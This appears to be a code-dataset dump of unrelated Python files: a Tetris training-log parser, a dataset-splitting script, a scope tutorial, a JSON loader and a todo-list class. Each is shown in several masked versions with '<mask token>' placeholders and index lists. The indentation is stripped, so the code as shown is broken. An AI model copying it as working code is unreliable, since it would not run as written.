'Training data size:\\s*(?P<tsize>\\d*)\\s*Validation data size:\\s*(?P<vsize>\\d*)'
)
queue_re = 'Memory usage: (?P<filled>\\d*) / (?P<size>\\d*).*'
self.data = defaultdict(list)
size = 0
filled = 0
rm_since_last_game = 0
with open(self.filename) as f:
lc_avg_tmp = []
sc_avg_tmp = []
data_accum = 0
training = False
for line in f.readlines():
match_score_re = re.search(score_re, line)
match_train_re = re.search(train_re, line)
match_datasize_re = re.search(datasize_re, line)
match_queue_re = re.search(queue_re, line)
if match_score_re:
d = match_score_re.groupdict()
lc = int(d['lines'])
sc = int(d['score'])
self.data['line_cleared'].append(lc)
self.data['score'].append(sc)
self.data['data_accumulated'].append(data_accum)
lc_avg_tmp.append(lc)
sc_avg_tmp.append(sc)
rm_since_last_game = 0
elif match_train_re:
d = match_train_re.groupdict()
self.data['training_loss'].append(float(d['t_loss']))
self.data['validation_loss'].append(float(d['v_loss']))
if d['v_loss_err'] == 'nan':
self.data['validation_loss_err'].append(0)
else:
self.data['validation_loss_err'].append(float(d[
'v_loss_err']))
self.data['g_norm'].append(float(d['g_norm']))
elif match_datasize_re:
d = match_datasize_re.groupdict()
tsize = int(d['tsize'])
vsize = int(d['vsize'])
data_accum += tsize + vsize
elif match_queue_re:
d = match_queue_re.groupdict()
filled = int(d['filled'])
size = int(d['size'])
elif 'REMOVING UNUSED' in line:
rm_since_last_game += 1
elif 'proceed to training' in line:
training = True
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
lc_avg_tmp.clear()
elif self.data['line_cleared_per_train']:
self.data['line_cleared_per_train'].append(self.
data['line_cleared_per_train'][-1])
else:
self.data['line_cleared_per_train'].append((0, 0))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
sc_avg_tmp.clear()
elif self.data['score_per_train']:
self.data['score_per_train'].append(self.data[
'score_per_train'][-1])
else:
self.data['score_per_train'].append((0, 0))
elif 'Training complete' in line:
training = False
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
if not training:
flocal = './model_checkpoint'
ftarget = '../pytorch_model/model_checkpoint'
ex_local = os.path.isfile(flocal)
ex_target = os.path.isfile(ftarget)
if ex_target and (ex_local and not filecmp.cmp(flocal,
ftarget) or not ex_local):
copyfile(ftarget, flocal)
self.data['filled'] = filled
self.data['size'] = size
self.data['rm_since_last_game'] = rm_since_last_game
class ModelParser:
def __init__(self, distributional=True):
self.last_update = -1
self.data = {}
self.distributional = distributional
def check_update(self):
flocal = './model_checkpoint'
if os.path.isfile(flocal):
latest = os.path.getmtime(flocal)
if latest > self.last_update:
print('New model found, updating...', flush=True)
self.last_update = latest
state = torch.load(flocal, map_location=torch.device('cpu'))
model_state = state['model_state_dict']
self.parse_state(model_state)
return True
return False
def parse(self, model):
self.parse_state(model.state_dict())
def parse_state(self, model_state):
self.data = {}
for k, v in model_state.items():
if 'weight' in k:
k = k.replace('.weight', '')
k = k.replace('seq.', '')
self.data[k] = v.cpu().numpy().ravel()
| <mask token>
class BoardParser:
<mask token>
<mask token>
class StatusParser:
def __init__(self):
self.board = np.memmap('../tmp/board', mode='r', dtype=np.int8,
shape=(20, 10))
self.combo = np.memmap('../tmp/combo', mode='r', dtype=np.int32,
shape=(1,))
self.lines = np.memmap('../tmp/lines', mode='r', dtype=np.int32,
shape=(1,))
self.score = np.memmap('../tmp/score', mode='r', dtype=np.int32,
shape=(1,))
self.line_stats = np.memmap('../tmp/line_stats', mode='r', dtype=np
.int32, shape=(4,))
class Parser:
def __init__(self, filename):
self.filename = filename
self.last_update = -1
def check_update(self):
latest_update = os.path.getmtime(self.filename)
if latest_update > self.last_update:
self.last_update = latest_update
self.parse()
return True
return False
def parse(self):
score_re = (
'Episode:\\s*(?P<episode>\\d*)\\s*Score:\\s*(?P<score>\\d*)\\s*Lines Cleared:\\s*(?P<lines>\\d*)'
)
train_re = (
'Iteration:\\s*(?P<iter>\\d*)\\s*training loss:\\s*(?P<t_loss>\\d*\\.\\d*)\\s*validation loss:\\s*(?P<v_loss>\\d*\\.\\d*)±\\s*(?P<v_loss_err>\\d*\\.\\d*|nan)\\s*gradient norm:\\s*(?P<g_norm>\\d*\\.\\d*)'
)
datasize_re = (
'Training data size:\\s*(?P<tsize>\\d*)\\s*Validation data size:\\s*(?P<vsize>\\d*)'
)
queue_re = 'Memory usage: (?P<filled>\\d*) / (?P<size>\\d*).*'
self.data = defaultdict(list)
size = 0
filled = 0
rm_since_last_game = 0
with open(self.filename) as f:
lc_avg_tmp = []
sc_avg_tmp = []
data_accum = 0
training = False
for line in f.readlines():
match_score_re = re.search(score_re, line)
match_train_re = re.search(train_re, line)
match_datasize_re = re.search(datasize_re, line)
match_queue_re = re.search(queue_re, line)
if match_score_re:
d = match_score_re.groupdict()
lc = int(d['lines'])
sc = int(d['score'])
self.data['line_cleared'].append(lc)
self.data['score'].append(sc)
self.data['data_accumulated'].append(data_accum)
lc_avg_tmp.append(lc)
sc_avg_tmp.append(sc)
rm_since_last_game = 0
elif match_train_re:
d = match_train_re.groupdict()
self.data['training_loss'].append(float(d['t_loss']))
self.data['validation_loss'].append(float(d['v_loss']))
if d['v_loss_err'] == 'nan':
self.data['validation_loss_err'].append(0)
else:
self.data['validation_loss_err'].append(float(d[
'v_loss_err']))
self.data['g_norm'].append(float(d['g_norm']))
elif match_datasize_re:
d = match_datasize_re.groupdict()
tsize = int(d['tsize'])
vsize = int(d['vsize'])
data_accum += tsize + vsize
elif match_queue_re:
d = match_queue_re.groupdict()
filled = int(d['filled'])
size = int(d['size'])
elif 'REMOVING UNUSED' in line:
rm_since_last_game += 1
elif 'proceed to training' in line:
training = True
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
lc_avg_tmp.clear()
elif self.data['line_cleared_per_train']:
self.data['line_cleared_per_train'].append(self.
data['line_cleared_per_train'][-1])
else:
self.data['line_cleared_per_train'].append((0, 0))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
sc_avg_tmp.clear()
elif self.data['score_per_train']:
self.data['score_per_train'].append(self.data[
'score_per_train'][-1])
else:
self.data['score_per_train'].append((0, 0))
elif 'Training complete' in line:
training = False
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
if not training:
flocal = './model_checkpoint'
ftarget = '../pytorch_model/model_checkpoint'
ex_local = os.path.isfile(flocal)
ex_target = os.path.isfile(ftarget)
if ex_target and (ex_local and not filecmp.cmp(flocal,
ftarget) or not ex_local):
copyfile(ftarget, flocal)
self.data['filled'] = filled
self.data['size'] = size
self.data['rm_since_last_game'] = rm_since_last_game
class ModelParser:
def __init__(self, distributional=True):
self.last_update = -1
self.data = {}
self.distributional = distributional
def check_update(self):
flocal = './model_checkpoint'
if os.path.isfile(flocal):
latest = os.path.getmtime(flocal)
if latest > self.last_update:
print('New model found, updating...', flush=True)
self.last_update = latest
state = torch.load(flocal, map_location=torch.device('cpu'))
model_state = state['model_state_dict']
self.parse_state(model_state)
return True
return False
def parse(self, model):
self.parse_state(model.state_dict())
def parse_state(self, model_state):
self.data = {}
for k, v in model_state.items():
if 'weight' in k:
k = k.replace('.weight', '')
k = k.replace('seq.', '')
self.data[k] = v.cpu().numpy().ravel()
| <mask token>
class BoardParser:
<mask token>
def update(self):
s = self.file.read()
if len(s) == 200:
self.data = np.fromstring(s, dtype=np.int8).reshape(20, 10)
self.file.seek(0)
class StatusParser:
def __init__(self):
self.board = np.memmap('../tmp/board', mode='r', dtype=np.int8,
shape=(20, 10))
self.combo = np.memmap('../tmp/combo', mode='r', dtype=np.int32,
shape=(1,))
self.lines = np.memmap('../tmp/lines', mode='r', dtype=np.int32,
shape=(1,))
self.score = np.memmap('../tmp/score', mode='r', dtype=np.int32,
shape=(1,))
self.line_stats = np.memmap('../tmp/line_stats', mode='r', dtype=np
.int32, shape=(4,))
class Parser:
def __init__(self, filename):
self.filename = filename
self.last_update = -1
def check_update(self):
latest_update = os.path.getmtime(self.filename)
if latest_update > self.last_update:
self.last_update = latest_update
self.parse()
return True
return False
def parse(self):
score_re = (
'Episode:\\s*(?P<episode>\\d*)\\s*Score:\\s*(?P<score>\\d*)\\s*Lines Cleared:\\s*(?P<lines>\\d*)'
)
train_re = (
'Iteration:\\s*(?P<iter>\\d*)\\s*training loss:\\s*(?P<t_loss>\\d*\\.\\d*)\\s*validation loss:\\s*(?P<v_loss>\\d*\\.\\d*)±\\s*(?P<v_loss_err>\\d*\\.\\d*|nan)\\s*gradient norm:\\s*(?P<g_norm>\\d*\\.\\d*)'
)
datasize_re = (
'Training data size:\\s*(?P<tsize>\\d*)\\s*Validation data size:\\s*(?P<vsize>\\d*)'
)
queue_re = 'Memory usage: (?P<filled>\\d*) / (?P<size>\\d*).*'
self.data = defaultdict(list)
size = 0
filled = 0
rm_since_last_game = 0
with open(self.filename) as f:
lc_avg_tmp = []
sc_avg_tmp = []
data_accum = 0
training = False
for line in f.readlines():
match_score_re = re.search(score_re, line)
match_train_re = re.search(train_re, line)
match_datasize_re = re.search(datasize_re, line)
match_queue_re = re.search(queue_re, line)
if match_score_re:
d = match_score_re.groupdict()
lc = int(d['lines'])
sc = int(d['score'])
self.data['line_cleared'].append(lc)
self.data['score'].append(sc)
self.data['data_accumulated'].append(data_accum)
lc_avg_tmp.append(lc)
sc_avg_tmp.append(sc)
rm_since_last_game = 0
elif match_train_re:
d = match_train_re.groupdict()
self.data['training_loss'].append(float(d['t_loss']))
self.data['validation_loss'].append(float(d['v_loss']))
if d['v_loss_err'] == 'nan':
self.data['validation_loss_err'].append(0)
else:
self.data['validation_loss_err'].append(float(d[
'v_loss_err']))
self.data['g_norm'].append(float(d['g_norm']))
elif match_datasize_re:
d = match_datasize_re.groupdict()
tsize = int(d['tsize'])
vsize = int(d['vsize'])
data_accum += tsize + vsize
elif match_queue_re:
d = match_queue_re.groupdict()
filled = int(d['filled'])
size = int(d['size'])
elif 'REMOVING UNUSED' in line:
rm_since_last_game += 1
elif 'proceed to training' in line:
training = True
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
lc_avg_tmp.clear()
elif self.data['line_cleared_per_train']:
self.data['line_cleared_per_train'].append(self.
data['line_cleared_per_train'][-1])
else:
self.data['line_cleared_per_train'].append((0, 0))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
sc_avg_tmp.clear()
elif self.data['score_per_train']:
self.data['score_per_train'].append(self.data[
'score_per_train'][-1])
else:
self.data['score_per_train'].append((0, 0))
elif 'Training complete' in line:
training = False
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
if not training:
flocal = './model_checkpoint'
ftarget = '../pytorch_model/model_checkpoint'
ex_local = os.path.isfile(flocal)
ex_target = os.path.isfile(ftarget)
if ex_target and (ex_local and not filecmp.cmp(flocal,
ftarget) or not ex_local):
copyfile(ftarget, flocal)
self.data['filled'] = filled
self.data['size'] = size
self.data['rm_since_last_game'] = rm_since_last_game
class ModelParser:
def __init__(self, distributional=True):
self.last_update = -1
self.data = {}
self.distributional = distributional
def check_update(self):
flocal = './model_checkpoint'
if os.path.isfile(flocal):
latest = os.path.getmtime(flocal)
if latest > self.last_update:
print('New model found, updating...', flush=True)
self.last_update = latest
state = torch.load(flocal, map_location=torch.device('cpu'))
model_state = state['model_state_dict']
self.parse_state(model_state)
return True
return False
def parse(self, model):
self.parse_state(model.state_dict())
def parse_state(self, model_state):
self.data = {}
for k, v in model_state.items():
if 'weight' in k:
k = k.replace('.weight', '')
k = k.replace('seq.', '')
self.data[k] = v.cpu().numpy().ravel()
| <mask token>
sys.path.append('../')
class BoardParser:
def __init__(self):
self.file = open('../board_output', 'rb')
self.data = None
def update(self):
s = self.file.read()
if len(s) == 200:
self.data = np.fromstring(s, dtype=np.int8).reshape(20, 10)
self.file.seek(0)
class StatusParser:
def __init__(self):
self.board = np.memmap('../tmp/board', mode='r', dtype=np.int8,
shape=(20, 10))
self.combo = np.memmap('../tmp/combo', mode='r', dtype=np.int32,
shape=(1,))
self.lines = np.memmap('../tmp/lines', mode='r', dtype=np.int32,
shape=(1,))
self.score = np.memmap('../tmp/score', mode='r', dtype=np.int32,
shape=(1,))
self.line_stats = np.memmap('../tmp/line_stats', mode='r', dtype=np
.int32, shape=(4,))
class Parser:
def __init__(self, filename):
self.filename = filename
self.last_update = -1
def check_update(self):
latest_update = os.path.getmtime(self.filename)
if latest_update > self.last_update:
self.last_update = latest_update
self.parse()
return True
return False
def parse(self):
score_re = (
'Episode:\\s*(?P<episode>\\d*)\\s*Score:\\s*(?P<score>\\d*)\\s*Lines Cleared:\\s*(?P<lines>\\d*)'
)
train_re = (
'Iteration:\\s*(?P<iter>\\d*)\\s*training loss:\\s*(?P<t_loss>\\d*\\.\\d*)\\s*validation loss:\\s*(?P<v_loss>\\d*\\.\\d*)±\\s*(?P<v_loss_err>\\d*\\.\\d*|nan)\\s*gradient norm:\\s*(?P<g_norm>\\d*\\.\\d*)'
)
datasize_re = (
'Training data size:\\s*(?P<tsize>\\d*)\\s*Validation data size:\\s*(?P<vsize>\\d*)'
)
queue_re = 'Memory usage: (?P<filled>\\d*) / (?P<size>\\d*).*'
self.data = defaultdict(list)
size = 0
filled = 0
rm_since_last_game = 0
with open(self.filename) as f:
lc_avg_tmp = []
sc_avg_tmp = []
data_accum = 0
training = False
for line in f.readlines():
match_score_re = re.search(score_re, line)
match_train_re = re.search(train_re, line)
match_datasize_re = re.search(datasize_re, line)
match_queue_re = re.search(queue_re, line)
if match_score_re:
d = match_score_re.groupdict()
lc = int(d['lines'])
sc = int(d['score'])
self.data['line_cleared'].append(lc)
self.data['score'].append(sc)
self.data['data_accumulated'].append(data_accum)
lc_avg_tmp.append(lc)
sc_avg_tmp.append(sc)
rm_since_last_game = 0
elif match_train_re:
d = match_train_re.groupdict()
self.data['training_loss'].append(float(d['t_loss']))
self.data['validation_loss'].append(float(d['v_loss']))
if d['v_loss_err'] == 'nan':
self.data['validation_loss_err'].append(0)
else:
self.data['validation_loss_err'].append(float(d[
'v_loss_err']))
self.data['g_norm'].append(float(d['g_norm']))
elif match_datasize_re:
d = match_datasize_re.groupdict()
tsize = int(d['tsize'])
vsize = int(d['vsize'])
data_accum += tsize + vsize
elif match_queue_re:
d = match_queue_re.groupdict()
filled = int(d['filled'])
size = int(d['size'])
elif 'REMOVING UNUSED' in line:
rm_since_last_game += 1
elif 'proceed to training' in line:
training = True
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
lc_avg_tmp.clear()
elif self.data['line_cleared_per_train']:
self.data['line_cleared_per_train'].append(self.
data['line_cleared_per_train'][-1])
else:
self.data['line_cleared_per_train'].append((0, 0))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
sc_avg_tmp.clear()
elif self.data['score_per_train']:
self.data['score_per_train'].append(self.data[
'score_per_train'][-1])
else:
self.data['score_per_train'].append((0, 0))
elif 'Training complete' in line:
training = False
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
if not training:
flocal = './model_checkpoint'
ftarget = '../pytorch_model/model_checkpoint'
ex_local = os.path.isfile(flocal)
ex_target = os.path.isfile(ftarget)
if ex_target and (ex_local and not filecmp.cmp(flocal,
ftarget) or not ex_local):
copyfile(ftarget, flocal)
self.data['filled'] = filled
self.data['size'] = size
self.data['rm_since_last_game'] = rm_since_last_game
class ModelParser:
def __init__(self, distributional=True):
self.last_update = -1
self.data = {}
self.distributional = distributional
def check_update(self):
flocal = './model_checkpoint'
if os.path.isfile(flocal):
latest = os.path.getmtime(flocal)
if latest > self.last_update:
print('New model found, updating...', flush=True)
self.last_update = latest
state = torch.load(flocal, map_location=torch.device('cpu'))
model_state = state['model_state_dict']
self.parse_state(model_state)
return True
return False
def parse(self, model):
self.parse_state(model.state_dict())
def parse_state(self, model_state):
self.data = {}
for k, v in model_state.items():
if 'weight' in k:
k = k.replace('.weight', '')
k = k.replace('seq.', '')
self.data[k] = v.cpu().numpy().ravel()
| import torch
import re
import sys
import os
import shutil
import filecmp
import numpy as np
from collections import defaultdict
from shutil import copyfile
sys.path.append('../')
class BoardParser:
def __init__(self):
self.file = open('../board_output', 'rb')
self.data = None
def update(self):
s = self.file.read()
if len(s) == 200:
self.data = np.fromstring(s, dtype=np.int8).reshape(20, 10)
self.file.seek(0)
class StatusParser:
def __init__(self):
self.board = np.memmap('../tmp/board', mode='r', dtype=np.int8, shape=(20, 10))
self.combo = np.memmap('../tmp/combo', mode='r', dtype=np.int32, shape=(1, ))
self.lines = np.memmap('../tmp/lines', mode='r', dtype=np.int32, shape=(1, ))
self.score = np.memmap('../tmp/score', mode='r', dtype=np.int32, shape=(1, ))
self.line_stats = np.memmap('../tmp/line_stats', mode='r', dtype=np.int32, shape=(4, ))
class Parser:
def __init__(self, filename):
self.filename = filename
self.last_update = -1
def check_update(self):
latest_update = os.path.getmtime(self.filename)
if latest_update > self.last_update:
self.last_update = latest_update
self.parse()
return True
return False
def parse(self):
score_re = 'Episode:\s*(?P<episode>\d*)\s*' \
'Score:\s*(?P<score>\d*)\s*' \
'Lines Cleared:\s*(?P<lines>\d*)'
train_re = 'Iteration:\s*(?P<iter>\d*)\s*' \
'training loss:\s*(?P<t_loss>\d*\.\d*)\s*' \
'validation loss:\s*(?P<v_loss>\d*\.\d*)±\s*(?P<v_loss_err>\d*\.\d*|nan)\s*' \
'gradient norm:\s*(?P<g_norm>\d*\.\d*)'
datasize_re = 'Training data size:\s*(?P<tsize>\d*)\s*' \
'Validation data size:\s*(?P<vsize>\d*)'
queue_re = 'Memory usage: (?P<filled>\d*) / (?P<size>\d*).*'
self.data = defaultdict(list)
size = 0
filled = 0
rm_since_last_game = 0
with open(self.filename) as f:
lc_avg_tmp = []
sc_avg_tmp = []
data_accum = 0
training = False
for line in f.readlines():
match_score_re = re.search(score_re, line)
match_train_re = re.search(train_re, line)
match_datasize_re = re.search(datasize_re, line)
match_queue_re = re.search(queue_re, line)
if match_score_re:
d = match_score_re.groupdict()
lc = int(d['lines'])
sc = int(d['score'])
self.data['line_cleared'].append(lc)
self.data['score'].append(sc)
self.data['data_accumulated'].append(data_accum)
lc_avg_tmp.append(lc)
sc_avg_tmp.append(sc)
rm_since_last_game = 0
elif match_train_re:
d = match_train_re.groupdict()
self.data['training_loss'].append(float(d['t_loss']))
self.data['validation_loss'].append(float(d['v_loss']))
if d['v_loss_err'] == 'nan':
self.data['validation_loss_err'].append(0)
else:
self.data['validation_loss_err'].append(float(d['v_loss_err']))
self.data['g_norm'].append(float(d['g_norm']))
#print(d['g_norm'])
elif match_datasize_re:
d = match_datasize_re.groupdict()
tsize = int(d['tsize'])
vsize = int(d['vsize'])
data_accum += (tsize + vsize)
elif match_queue_re:
d = match_queue_re.groupdict()
filled = int(d['filled'])
size = int(d['size'])
elif 'REMOVING UNUSED' in line:
rm_since_last_game += 1
elif 'proceed to training' in line:
training = True
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
lc_avg_tmp.clear()
else:
if self.data['line_cleared_per_train']:
self.data['line_cleared_per_train'].append(
self.data['line_cleared_per_train'][-1])
else:
self.data['line_cleared_per_train'].append((0, 0))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
sc_avg_tmp.clear()
else:
if self.data['score_per_train']:
self.data['score_per_train'].append(
self.data['score_per_train'][-1])
else:
self.data['score_per_train'].append((0, 0))
elif 'Training complete' in line:
training = False
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
if not training:
flocal = './model_checkpoint'
ftarget = '../pytorch_model/model_checkpoint'
ex_local = os.path.isfile(flocal)
ex_target = os.path.isfile(ftarget)
if ex_target and ((ex_local and not filecmp.cmp(flocal, ftarget)) or not ex_local):
copyfile(ftarget, flocal)
self.data['filled'] = filled
self.data['size'] = size
self.data['rm_since_last_game'] = rm_since_last_game
class ModelParser:
def __init__(self, distributional=True):
self.last_update = -1
self.data = {}
self.distributional = distributional
def check_update(self):
flocal = './model_checkpoint'
if os.path.isfile(flocal):
latest = os.path.getmtime(flocal)
if latest > self.last_update:
print('New model found, updating...', flush=True)
self.last_update = latest
state = torch.load(flocal, map_location=torch.device('cpu'))
model_state = state['model_state_dict']
self.parse_state(model_state)
return True
return False
def parse(self, model):
self.parse_state(model.state_dict())
def parse_state(self, model_state):
self.data = {}
for k, v in model_state.items():
if 'weight' in k:
k = k.replace('.weight', '')
k = k.replace('seq.', '')
self.data[k] = v.cpu().numpy().ravel()
| [
11,
12,
13,
15,
17
] |
628 | 32b3e65add5fb44320898b682e8f94f1460a32e7 | <mask token>
| def create_meme(word):
return f'this is your meme NEW VERSION {word}'
| null | null | null | [
0,
1
] |
629 | a714ac227d5185d7b4a932695ba6698e18d96341 | # -*- coding: utf-8 -*-
import sys
from os import listdir, makedirs, unlink
from os.path import isdir, join, isfile, exists
from shutil import copy
import random
def clearDirectory( path ):#将dataset里面的文件都删除
for the_file in listdir(path):
file_path = join(path, the_file)
try:
if isfile(file_path):
unlink(file_path)
except Exception, e:
print e
print 'Number of arguments:', len(sys.argv), 'arguments.'
print 'argument list:', str(sys.argv)
if len(sys.argv) < 3:
print 'Arguments is not enough! You need use the dataset and test category.'
sys.exit();
datasetPath = sys.argv[1]
category = sys.argv[2]
if len(sys.argv) > 3:
trainingNum = (int)(sys.argv[3])
else:
trainingNum = 0
if len(sys.argv) > 4:
testingNum = (int)(sys.argv[4])
else:
testingNum = 0
print 'dataset is ', datasetPath, ' and category is ', category
categories = [f for f in listdir(datasetPath) if isdir(join(datasetPath, f))]
if category not in categories:
print 'category is not in the dataset please check that'
sys.exit();
print 'start generating training and testing file...'
categoryPath = datasetPath + '/' + category
categoryFiles = [f for f in listdir(categoryPath) if isfile(join(categoryPath,f))]
print category, 'contains ', len(categoryFiles) , 'file'
otherCategories = [x for x in categories if x != category]
otherCategoriesFiles = [y + '/' + x for y in otherCategories for x in listdir(datasetPath + '/' + y)]
defaultNum = (int)(len(categoryFiles))
if trainingNum <= 0:
trainingNum = defaultNum
elif trainingNum > defaultNum:
trainingNum = defaultNum
if testingNum <= 0:
testingNum = min(defaultNum / 2, len(categoryFiles) - testingNum)
elif testingNum > min(defaultNum / 2, len(categoryFiles) - testingNum):
testingNum = min(defaultNum / 2, len(categoryFiles) - testingNum)
print 'trainingNum is', trainingNum
print 'testingNum is', testingNum
rand_smpl = [ categoryFiles[i] for i in sorted(random.sample(xrange(len(categoryFiles)), trainingNum)) ]
test_files = [x for x in categoryFiles if x not in rand_smpl]
test_smpl = [test_files[i] for i in random.sample(xrange(len(test_files)), testingNum)]
trainingDir = 'dataset/training'
testingDir = 'dataset/testing'
if not exists(trainingDir):
makedirs(trainingDir)
if not exists(testingDir):
makedirs(testingDir)
clearDirectory(trainingDir)
clearDirectory(testingDir)
text_file = open("training.txt", "w")
trainingIndex = 1
for jpgfile in rand_smpl:
filepath = categoryPath + '/' + jpgfile
outputFilePath = 'image_' + str(trainingIndex) + '.jpg'
text_file.write('dataset/training/' + outputFilePath + ' 1\n')
copy(filepath, trainingDir + '/' + outputFilePath)
trainingIndex += 1
training_smpl = [ otherCategoriesFiles[i] for i in random.sample(xrange(len(otherCategoriesFiles)), trainingNum)]
for jpgfile in training_smpl:
filepath = datasetPath + '/' + jpgfile
outputFilePath = 'image_' + str(trainingIndex) + '.jpg'
text_file.write('dataset/training/' + outputFilePath + ' 0\n')
copy(filepath, trainingDir + '/' + outputFilePath)
trainingIndex += 1
text_file.close()
text_file = open("testing.txt", "w")
trainingIndex = 1
for jpgfile in test_smpl:
filepath = categoryPath + '/' + jpgfile
outputFilePath = 'image_' + str(trainingIndex) + '.jpg'
text_file.write('dataset/testing/' + outputFilePath + ' 1\n')
copy(filepath, testingDir + '/' + outputFilePath)
trainingIndex += 1
testing_smpl = [ otherCategoriesFiles[i] for i in random.sample(xrange(len(otherCategoriesFiles)), testingNum)]
for jpgfile in testing_smpl:
filepath = datasetPath + '/' + jpgfile
outputFilePath = 'image_' + str(trainingIndex) + '.jpg'
text_file.write('dataset/testing/' + outputFilePath + ' 0\n')
copy(filepath, testingDir + '/' + outputFilePath)
trainingIndex += 1
text_file.close()
| null | null | null | null | [
0
] |
630 | 6af5faaaa9d894dd2b882cfe1bb8b8225780743c | <mask token>
def funky():
spam = 302
print(spam)
<mask token>
def sayHello(name):
print('Hello, ' + name)
<mask token>
| <mask token>
def funky():
spam = 302
print(spam)
<mask token>
def sayHello(name):
print('Hello, ' + name)
<mask token>
def spam(myName):
print('Hello, ' + myName)
myName = 'Waffles'
print('Your new name is ' + myName)
<mask token>
| <mask token>
print('Why not ?')
print(True and not False)
<mask token>
def funky():
spam = 302
print(spam)
funky()
print(spam)
def sayHello(name):
print('Hello, ' + name)
print('Say hello to Alice.')
<mask token>
sayHello(fizzy)
print('Do not forget to say hello to Bob.')
sayHello('Bob')
sayHello('Lee')
def spam(myName):
print('Hello, ' + myName)
myName = 'Waffles'
print('Your new name is ' + myName)
<mask token>
spam(myName)
print('Howdy, ' + myName)
| <mask token>
print('Why not ?')
print(True and not False)
spam = 1208
def funky():
spam = 302
print(spam)
funky()
print(spam)
def sayHello(name):
print('Hello, ' + name)
print('Say hello to Alice.')
fizzy = 'Alice'
sayHello(fizzy)
print('Do not forget to say hello to Bob.')
sayHello('Bob')
sayHello('Lee')
def spam(myName):
print('Hello, ' + myName)
myName = 'Waffles'
print('Your new name is ' + myName)
myName = 'Albert'
spam(myName)
print('Howdy, ' + myName)
| '''
# VariableScope.py
#
# Written by leezhm on 13th March, 2012.
#
# Copyright (C) leezhm(c)126.com. All Right Reserved.
#
# For Chapter 6 Dragon Realm
#
# <<Invent Your Own Computer Games with Python>>
'''
print('Why not ?')
print(True and not False)
# A global variable named "spam"
spam = 1208
# This block doesn't run until funky() is called.
def funky() :
# We read the global variable's value:
# print(spam)
# We create a local variable named "spam"
# instead of changing the value of the global variable "spam"
spam = 302
# The name "spam" now refers to the local variable only
# for the rest of this function:
print(spam)
# Call the function funky():
funky()
# The global variable was not changed in funky():
print(spam)
# Function with parameters
def sayHello(name) :
print('Hello, ' + name)
print('Say hello to Alice.')
fizzy = 'Alice'
sayHello(fizzy)
print('Do not forget to say hello to Bob.')
sayHello('Bob')
sayHello('Lee')
def spam(myName) :
print('Hello, ' + myName)
myName = 'Waffles'
print('Your new name is ' + myName)
myName = 'Albert'
spam(myName)
print('Howdy, ' + myName) | [
2,
3,
4,
5,
6
] |
631 | 98bd4eb25a76fb9184f9abfcb920a6fbe46b9394 | <mask token>
| <mask token>
with open('sub.json', 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',', ':')))
| <mask token>
subjects = []
with open('sub.json', 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',', ':')))
| import json
subjects = []
with open('sub.json', 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',', ':')))
| import json
subjects = []
with open("sub.json", 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',',':')))
| [
0,
1,
2,
3,
4
] |
632 | 168a12e6653a0526f29c163913def50147481154 | <mask token>
class ListItem:
"""A custom object that stores four pieces of data representing each
entry in the todo list. Contains the text of the todo list entry,
the priority of the entry, the group code (NYI), and the visibility of
